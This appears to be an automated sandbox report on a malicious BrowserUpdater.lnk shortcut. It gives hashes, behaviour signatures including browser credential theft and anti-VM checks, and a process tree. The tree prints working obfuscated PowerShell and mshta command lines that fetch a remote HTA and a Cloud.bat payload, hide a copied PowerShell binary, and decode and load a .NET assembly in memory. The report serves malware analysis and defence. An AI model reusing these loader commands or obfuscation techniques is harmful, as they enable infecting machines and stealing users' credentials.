Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

07/08/2024, 21:06

240807-zxvl6sxfkf 10

06/08/2024, 20:12

240806-yzbfmssgqc 10

06/08/2024, 19:51

240806-yk45eaydrn 10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/08/2024, 19:51

General

  • Target

    BrowserUpdater.lnk

  • Size

    2KB

  • MD5

    7ed0b7e22f568d2eedaf956ba831d0a6

  • SHA1

    c073465e6ca109f2069f2e26f28525e66da54bee

  • SHA256

    7a6ad3868f0223896ceea378a056b2568ad6f6ca2e65baaa7b55e1033da3abd7

  • SHA512

    c718e67fb2554d7bbbac60a1a3dae6fe6bcdf4c06c0cababd8b623d52f1d306f9441c27deaaff269e129fb0dcecb17430480b1941b14d95a01d3ffd4c87887cd

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://redr.me/g3boil/

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 11 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\BrowserUpdater.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $C='.dmsi:aLSretpobg3hl/'; &(-join($C[(-612+615),(909-903),(148-141)])) :* (-join($C[(-612+615),(909-903),(148-141)])); :* %\ (-join($C[(410-408),(-612+615),(429-412),(-438+449),(909-903)])); foreach($p in @((371-354),(-821+832),(335-324),(-207+219),(-654+657),(740-735),(-129+148),(890-871),(222-213),(-354+364),(-800+801),(683-674),(550-550),(261-259),(462-452),(938-919),(-453+468),(-790+806),(-864+878),(749-736),(-625+629),(626-608),(-363+382))){$Y+=$C[$p]}; %\ $Y;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:220
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://redr.me/g3boil/
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3564
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function uqAehMaIe($NJTwTbrMX, $XJZkVi){[IO.File]::WriteAllBytes($NJTwTbrMX, $XJZkVi)};function apapZoXr($NJTwTbrMX){if($NJTwTbrMX.EndsWith((yNrVuHrL @(59913,59967,59975,59975))) -eq $True){Start-Process (yNrVuHrL @(59981,59984,59977,59967,59975,59975,59918,59917,59913,59968,59987,59968)) $NJTwTbrMX}else{Start-Process $NJTwTbrMX}};function gqcoIri($AHPcmYwv){$WfBZy = New-Object (yNrVuHrL @(59945,59968,59983,59913,59954,59968,59965,59934,59975,59972,59968,59977,59983));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XJZkVi = $WfBZy.DownloadData($AHPcmYwv);return $XJZkVi};function yNrVuHrL($nIhcvb){$kXpIyeO=59867;$yoiSqUYc=$Null;foreach($SdAaMQf in $nIhcvb){$yoiSqUYc+=[char]($SdAaMQf-$kXpIyeO)};return $yoiSqUYc};function ZIxEQA(){$AQGzE = $env:APPDATA + '\';$tvNCPRFAm = gqcoIri (yNrVuHrL @(59971,59983,59983,59979,59982,59925,59914,59914,59970,59972,59983,59971,59984,59965,59913,59966,59978,59976,59914,59933,59981,59978,59986,59982,59968,59981,59934,59978,59976,59979,59964,59977,59988,59943,59943,59934,59914,59912,59916,59917,59914,59981,59968,59975,59968,59964,59982,59968,59982,59914,59967,59978,59986,59977,59975,59978,59964,59967,59914,59982,59968,59976,59983,59964,59970,59914,59934,59975,59978,59984,59967,59913,59965,59964,59983));$CRARBv = $AQGzE + 'Cloud.bat';uqAehMaIe $CRARBv $tvNCPRFAm;apapZoXr $CRARBv;;;;}ZIxEQA;
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4860
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Cloud.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1500
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo F "
              6⤵
                PID:2584
              • C:\Windows\system32\xcopy.exe
                xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Cloud.bat.Pzv
                6⤵
                  PID:1280
                • C:\Windows\system32\attrib.exe
                  attrib +s +h C:\Users\Admin\AppData\Roaming\Cloud.bat.Pzv
                  6⤵
                  • Sets file to hidden
                  • Views/modifies file attributes
                  PID:1396
                • C:\Users\Admin\AppData\Roaming\Cloud.bat.Pzv
                  C:\Users\Admin\AppData\Roaming\Cloud.bat.Pzv -WindowStyle hidden -command "$Ecqtlufnjt = get-content 'C:\Users\Admin\AppData\Roaming\Cloud.bat' | Select-Object -Last 1; $Vtnaspcvjk = [System.Convert]::FromBase64String($Ecqtlufnjt);$Poigdt = New-Object System.IO.MemoryStream( , $Vtnaspcvjk );$Narzsx = New-Object System.IO.MemoryStream;$Wfbek = New-Object System.IO.Compression.GzipStream $Poigdt, ([IO.Compression.CompressionMode]::Decompress);$Wfbek.CopyTo( $Narzsx );$Wfbek.Close();$Poigdt.Close();[byte[]] $Vtnaspcvjk = $Narzsx.ToArray();[Array]::Reverse($Vtnaspcvjk); $Dlehxafgx = [System.Threading.Thread]::GetDomain().Load($Vtnaspcvjk); $Wtslmaz = $Dlehxafgx.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Wtslmaz.DeclaringType, $Wtslmaz.Name).DynamicInvoke() | Out-Null"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4848
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
                    7⤵
                    • Checks for VirtualBox DLLs, possible anti-VM trick
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2488
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FI "IMAGENAME eq chrome.exe" /NH /FO CSV
                      8⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4516
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FI "IMAGENAME eq chrome.exe" /NH /FO CSV
                      8⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4156
                    • C:\Windows\System32\Wbem\wmic.exe
                      wmic process where "" get CommandLine,ProcessId
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2684

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        132c92683a511577904d6780c0d1aa38

        SHA1

        99cb462ce85d35ec5557f9d07bf0b45d68fe8d98

        SHA256

        0e8909c729ec2a2fc30cb80f884569a2ffab1e28a9b26a0c459b0f69b81a9535

        SHA512

        4fb98c45d7def7a1cbd8a10f013020740d191707bc7ded8d1001370776c63a271b44054ad49e433823b9948c33e2b03e92b94ac08ca4f7157493aa8682ba1b80

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        806286a9ea8981d782ba5872780e6a4c

        SHA1

        99fe6f0c1098145a7b60fda68af7e10880f145da

        SHA256

        cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

        SHA512

        362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwjr52n1.rk5.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Cloud.bat

        Filesize

        642KB

        MD5

        1369fd10f66d0ab867aab559253b01e4

        SHA1

        7509024aa23625a16166eb0c59f74562a45a4a97

        SHA256

        a444e147dd38ee76b4968f772ed67e0ed805de116137621e10acfa93781fe2c8

        SHA512

        0661f74c1b7c91433dcf0522b1d944dd7b68e7f7eba1df26c76f87756268696e8d46f5d2b88d452cfbd9034a9768f990e189739422053d650641b55cb5621f3e

      • C:\Users\Admin\AppData\Roaming\Cloud.bat.Pzv

        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      • memory/220-2-0x00007FFFB8EB3000-0x00007FFFB8EB5000-memory.dmp

        Filesize

        8KB

      • memory/220-12-0x000001CCF4040000-0x000001CCF4062000-memory.dmp

        Filesize

        136KB

      • memory/220-13-0x00007FFFB8EB0000-0x00007FFFB9971000-memory.dmp

        Filesize

        10.8MB

      • memory/220-14-0x00007FFFB8EB0000-0x00007FFFB9971000-memory.dmp

        Filesize

        10.8MB

      • memory/220-17-0x00007FFFB8EB0000-0x00007FFFB9971000-memory.dmp

        Filesize

        10.8MB

      • memory/4848-95-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-83-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-75-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-81-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-77-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-74-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-101-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-99-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-109-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-107-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-105-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-103-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-97-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-72-0x0000014635E90000-0x0000014635FC2000-memory.dmp

        Filesize

        1.2MB

      • memory/4848-93-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-91-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-89-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-87-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-85-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-73-0x0000014636200000-0x0000014636986000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-79-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-121-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-123-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-137-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-135-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-133-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-131-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-129-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-125-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-127-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-119-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-117-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-115-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-113-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-111-0x0000014636200000-0x0000014636980000-memory.dmp

        Filesize

        7.5MB

      • memory/4848-1110-0x0000014636980000-0x0000014637086000-memory.dmp

        Filesize

        7.0MB

      • memory/4848-1111-0x0000014637090000-0x00000146370DC000-memory.dmp

        Filesize

        304KB

      • memory/4848-1112-0x00000146370E0000-0x0000014637134000-memory.dmp

        Filesize

        336KB